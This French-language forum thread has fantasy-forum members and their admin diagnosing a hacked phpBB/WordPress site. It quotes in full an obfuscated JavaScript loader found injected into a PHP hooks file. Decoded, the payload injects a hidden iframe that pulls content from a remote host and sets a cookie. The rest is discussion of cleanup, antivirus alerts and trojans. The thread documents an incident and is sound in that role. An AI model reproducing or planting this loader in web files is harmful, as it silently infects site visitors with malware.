Les chemins de Khatovar

J'ai d'étranges lignes de texte en haut de l'écran.
Et je n'arrive plus à accéder au menu des admins. (du coup je ne peux plus fouetter les bots)
Ca n'a pas l'air très catholique tout ça.
Ca le fait pareil avec vous?

WOuhou ca remarche merci super Greg !

pour ceux qui ne savaient pas: on a pu communiquer par ce biais en attendant: https://www.facebook.com/groups/421724697860508/

le 29/08/2013 du code s'est inscrit en footer sur le fichier forum/includes/hooks/index.php j'ai viré ce code bizarre et tout est rentré dans l'ordre

maintenant bug ou hack ?

Génial tout est rentré dans l'ordre!
Merci Gregor!

le panneau d'admin merdouille encore mais je m'en occuperais demain

Gregor Herbert Clegane a écrit :le 29/08/2013 du code s'est inscrit en footer sur le fichier forum/includes/hooks/index.php j'ai viré ce code bizarre et tout est rentré dans l'ordre
maintenant bug ou hack ?

Ets-ce le code bizzare était "cohérent" ou bien il s'agissait de lignes qui ne faisait que faire déborder la taille du fichier php a + de 250 lignes ?
est-ce qu'un programme pourrait automatiquemeent insérer du code dans un fichier php ?

voilà ce qui avait été rajouté après ?>

#74ed9f#
if(empty($xts)) { $xts = " <script type=\"text/javascript\" language=\"javascript\" > pqo=\"y\";kyhf=\"d\"+\"o\"+\"c\"+\"ument\";try{+function(){if(document.querySelector)++(window[kyhf].body)==null}()}catch(fkpifk){fzmsj=function(wvksp){wvksp=\"fr\"+\"omCh\"+wvksp;for(gycbuy=0;gycbuy<pqo.length;gycbuy++){bay+=String[wvksp](bzr(ezm+(pqo[gycbuy]))-(102));}};};bzr=(eval);ezm=\"0x\";ulqx=0;try{;}catch(ebuvo){ulqx=1}if(!ulqx){try{++bzr(kyhf)[\"\x62o\"+\"d\"+pqo]}catch(fkpifk){wvb=\"^\";}pqo=\"86^cc^db^d4^c9^da^cf^d5^d4^86^d5^cf^e0^e0^96^9f^8e^8f^86^e1^73^70^86^dc^c7^d8^86^d9^da^c7^da^cf^c9^a3^8d^c7^d0^c7^de^8d^a1^73^70^86^dc^c7^d8^86^c9^d5^d4^da^d8^d5^d2^d2^cb^d8^a3^8d^cf^d4^ca^cb^de^94^d6^ce^d6^8d^a1^73^70^86^dc^c7^d8^86^d5^cf^e0^e0^86^a3^86^ca^d5^c9^db^d3^cb^d4^da^94^c9^d8^cb^c7^da^cb^ab^d2^cb^d3^cb^d4^da^8e^8d^cf^cc^d8^c7^d3^cb^8d^8f^a1^73^70^73^70^86^d5^cf^e0^e0^94^d9^d8^c9^86^a3^86^8d^ce^da^da^d6^a0^95^95^c7^d4^ca^cb^d8^d9^d5^d4^d2^c7^dd^d6^d2^d2^c9^94^c9^d5^d3^95^de^b3^da^bd^bc^d4^b7^99^94^d6^ce^d6^8d^a1^73^70^86^d5^cf^e0^e0^94^d9^da^df^d2^cb^94^d6^d5^d9^cf^da^cf^d5^d4^86^a3^86^8d^c7^c8^d9^d5^d2^db^da^cb^8d^a1^73^70^86^d5^cf^e0^e0^94^d9^da^df^d2^cb^94^c9^d5^d2^d5^d8^86^a3^86^8d^99^9f^9e^8d^a1^73^70^86^d5^cf^e0^e0^94^d9^da^df^d2^cb^94^ce^cb^cf^cd^ce^da^86^a3^86^8d^99^9f^9e^d6^de^8d^a1^73^70^86^d5^cf^e0^e0^94^d9^da^df^d2^cb^94^dd^cf^ca^da^ce^86^a3^86^8d^99^9f^9e^d6^de^8d^a1^73^70^86^d5^cf^e0^e0^94^d9^da^df^d2^cb^94^d2^cb^cc^da^86^a3^86^8d^97^96^96^96^99^9f^9e^8d^a1^73^70^86^d5^cf^e0^e0^94^d9^da^df^d2^cb^94^da^d5^d6^86^a3^86^8d^97^96^96^96^99^9f^9e^8d^a1^73^70^73^70^86^cf^cc^86^8e^87^ca^d5^c9^db^d3^cb^d4^da^94^cd^cb^da^ab^d2^cb^d3^cb^d4^da^a8^df^af^ca^8e^8d^d5^cf^e0^e0^8d^8f^8f^86^e1^73^70^86^ca^d5^c9^db^d3^cb^d4^da^94^dd^d8^cf^da^cb^8e^8d^a2^d6^86^cf^ca^a3^c2^8d^d5^cf^e0^e0^c2^8d^86^c9^d2^c7^d9^d9^a3^c2^8d^d5^cf^e0^e0^96^9f^c2^8d^86^a4^a2^95^d6^a4^8d^8f^a1^73^70^86^ca^d5^c9^db^d3^cb^d4^da^94^cd^cb^da^ab^d2^cb^d3^cb^d4^da^a8^df^af^ca^8e^8d^d5^cf^e0^e0^8d^8f^94^c7^d6^d6^cb^d4^ca^a9^ce^cf^d2^ca^8e^d5^cf^e0^e0^8f^a1^73^70^86^e3^73^70^e3^73^70^cc^db^d4^c9^da^cf^d5^d4^86^b9^cb^da^a9^d5^d5^d1^cf^cb^8e^c9^d5^d5^d1^cf^cb^b4^c7^d3^cb^92^c9^d5^d5^d1^cf^cb^bc^c7^d2^db^cb^92^d4^aa^c7^df^d9^92^d6^c7^da^ce^8f^86^e1^73^70^86^dc^c7^d8^86^da^d5^ca^c7^df^86^a3^86^d4^cb^dd^86^aa^c7^da^cb^8e^8f^a1^73^70^86^dc^c7^d8^86^cb^de^d6^cf^d8^cb^86^a3^86^d4^cb^dd^86^aa^c7^da^cb^8e^8f^a1^73^70^86^cf^cc^86^8e^d4^aa^c7^df^d9^a3^a3^d4^db^d2^d2^86^e2^e2^86^d4^aa^c7^df^d9^a3^a3^96^8f^86^d4^aa^c7^df^d9^a3^97^a1^73^70^86^cb^de^d6^cf^d8^cb^94^d9^cb^da^ba^cf^d3^cb^8e^da^d5^ca^c7^df^94^cd^cb^da^ba^cf^d3^cb^8e^8f^86^91^86^99^9c^96^96^96^96^96^90^98^9a^90^d4^aa^c7^df^d9^8f^a1^73^70^86^ca^d5^c9^db^d3^cb^d4^da^94^c9^d5^d5^d1^cf^cb^86^a3^86^c9^d5^d5^d1^cf^cb^b4^c7^d3^cb^91^88^a3^88^91^cb^d9^c9^c7^d6^cb^8e^c9^d5^d5^d1^cf^cb^bc^c7^d2^db^cb^8f^73^70^86^91^86^88^a1^cb^de^d6^cf^d8^cb^d9^a3^88^86^91^86^cb^de^d6^cf^d8^cb^94^da^d5^ad^b3^ba^b9^da^d8^cf^d4^cd^8e^8f^86^91^86^8e^8e^d6^c7^da^ce^8f^86^a5^86^88^a1^86^d6^c7^da^ce^a3^88^86^91^86^d6^c7^da^ce^86^a0^86^88^88^8f^a1^73^70^e3^73^70^cc^db^d4^c9^da^cf^d5^d4^86^ad^cb^da^a9^d5^d5^d1^cf^cb^8e^86^d4^c7^d3^cb^86^8f^86^e1^73^70^86^dc^c7^d8^86^d9^da^c7^d8^da^86^a3^86^ca^d5^c9^db^d3^cb^d4^da^94^c9^d5^d5^d1^cf^cb^94^cf^d4^ca^cb^de^b5^cc^8e^86^d4^c7^d3^cb^86^91^86^88^a3^88^86^8f^a1^73^70^86^dc^c7^d8^86^d2^cb^d4^86^a3^86^d9^da^c7^d8^da^86^91^86^d4^c7^d3^cb^94^d2^cb^d4^cd^da^ce^86^91^86^97^a1^73^70^86^cf^cc^86^8e^86^8e^86^87^d9^da^c7^d8^da^86^8f^86^8c^8c^73^70^86^8e^86^d4^c7^d3^cb^86^87^a3^86^ca^d5^c9^db^d3^cb^d4^da^94^c9^d5^d5^d1^cf^cb^94^d9^db^c8^d9^da^d8^cf^d4^cd^8e^86^96^92^86^d4^c7^d3^cb^94^d2^cb^d4^cd^da^ce^86^8f^86^8f^86^8f^73^70^86^e1^73^70^86^d8^cb^da^db^d8^d4^86^d4^db^d2^d2^a1^73^70^86^e3^73^70^86^cf^cc^86^8e^86^d9^da^c7^d8^da^86^a3^a3^86^93^97^86^8f^86^d8^cb^da^db^d8^d4^86^d4^db^d2^d2^a1^73^70^86^dc^c7^d8^86^cb^d4^ca^86^a3^86^ca^d5^c9^db^d3^cb^d4^da^94^c9^d5^d5^d1^cf^cb^94^cf^d4^ca^cb^de^b5^cc^8e^86^88^a1^88^92^86^d2^cb^d4^86^8f^a1^73^70^86^cf^cc^86^8e^86^cb^d4^ca^86^a3^a3^86^93^97^86^8f^86^cb^d4^ca^86^a3^86^ca^d5^c9^db^d3^cb^d4^da^94^c9^d5^d5^d1^cf^cb^94^d2^cb^d4^cd^da^ce^a1^73^70^86^d8^cb^da^db^d8^d4^86^db^d4^cb^d9^c9^c7^d6^cb^8e^86^ca^d5^c9^db^d3^cb^d4^da^94^c9^d5^d5^d1^cf^cb^94^d9^db^c8^d9^da^d8^cf^d4^cd^8e^86^d2^cb^d4^92^86^cb^d4^ca^86^8f^86^8f^a1^73^70^e3^73^70^cf^cc^86^8e^d4^c7^dc^cf^cd^c7^da^d5^d8^94^c9^d5^d5^d1^cf^cb^ab^d4^c7^c8^d2^cb^ca^8f^73^70^e1^73^70^cf^cc^8e^ad^cb^da^a9^d5^d5^d1^cf^cb^8e^8d^dc^cf^d9^cf^da^cb^ca^c5^db^d7^8d^8f^a3^a3^9b^9b^8f^e1^e3^cb^d2^d9^cb^e1^b9^cb^da^a9^d5^d5^d1^cf^cb^8e^8d^dc^cf^d9^cf^da^cb^ca^c5^db^d7^8d^92^86^8d^9b^9b^8d^92^86^8d^97^8d^92^86^8d^95^8d^8f^a1^73^70^73^70^d5^cf^e0^e0^96^9f^8e^8f^a1^73^70^e3^73^70^e3\".split(wvb);bay=\"\";fzmsj(\"arCode\");bzr(\"\"+bay);}</script> "; echo $xts; }
#/74ed9f#

Ouf, j'ai eu peur que sonne le glas...

tain qu'est-ce que c'est que cette portion de code inbitable...

pour info regardez ce que j'ai trouvé la -> http://www.wordpress-fr.net/support/vie ... p?id=86370

Albéric a écrit :Ouf, j'ai eu peur que sonne le glas...

même si on est un hacké un jour on remontera le truc à partir de la dernière svg, bon on peut perdre quelques semaines ou mois de posts mais on repartira jamais de rien

Juste pour info il y a encore du code bizzare qui apparaît dans le panneau de contrôle de l'utilisateur.

ok exact

la page d’accueil est réparée (ce qui ne fut pas une mince affaire)

maintenant le bug touche un peu le site / wordpress

ça sent le hack quand même tout ça

Eh ben c'est vraiment pas marrant tout ça. Heureusement que tu es là pour veiller au grain.
Maintenant reste les questions du qui et du pourquoi.

Boah, ça peut taper au hasard, y'a pas de règle. Non ?

Ou alors on devient trop populaires! C'est une machination montée par les autres forums SF/Fantasy pour tenter de nous réduire au silence!^^

le panneau de contrôle c'est réparé. Par contre sur le site j'arrive pas à trouver le fichier infecté.

On a pas été ciblé spécialement, c'est plein de sites qui ont été touchés. Que des wordpress et des phpBB surement.

bon quelques fichiers sont vérolés dans le panneau d'admin sans en empecher le bon fonctionnement mais du coup je peux pas supprimer les bots car mon antivirus panique

Quand je veux renter dans le panneau de l'admin, j'ai Avast qui me dit qu'il a bloqué un cheval de troie. Si ya un truc comme ca dans un fichier php ca pue le hack à plein nez !

oui mais je pense que les fichiers ont du code pourri mais avast m'empeche de réparer ça

Pour moi, il ne se passe rien (et j'ai Bitdefender pourtant), du coup je peux fracasser du bot à tour de bras.

EDIT : J'ai parlé trop vite. Mon antivirus était désactivé. Ça bloque aussi pour moi.

Aucun pb de connexion à l'admin ni du boulot ni chez moi.
Du coup je vais vérifier ce soir si l'anti-virus est bien activé...

nan nan ne vérifie pas faut bien quelqu'un pour supprimer les bots

Gregor Herbert Clegane a écrit :nan nan ne vérifie pas faut bien quelqu'un pour supprimer les bots

Tam tu es bien notre dernier rempart !

LOL!

Ben fait je suis en train de télécharger Avast là parce que visiblement mon antivirus était stylé façon passoire.
Mais pas de souci pour les bots, au boulot ça marche toujours...

Bon alors effectivement depuis que j'ai avast, je ne peux plus acceder à l'admin.
Avant j'avais microsoft security mais il n'était visiblement pas au niveau. Avast m'a détecté 11 fichiers infectés dont 2 trojans

Les chemins de Khatovar

Bug

Bug

Re: Bug

Re: Bug

Re: Bug

Re: Bug

Re: Bug

Re: Bug

Re: Bug

Re: Bug

Re: Bug

Re: Bug

Re: Bug

Re: Bug

Re: Bug

Re: Bug

Re: Bug

Re: Bug

Re: Bug

Re: Bug

Re: Bug

Re: Bug

Re: Bug

Re: Bug

Re: Bug

Re: Bug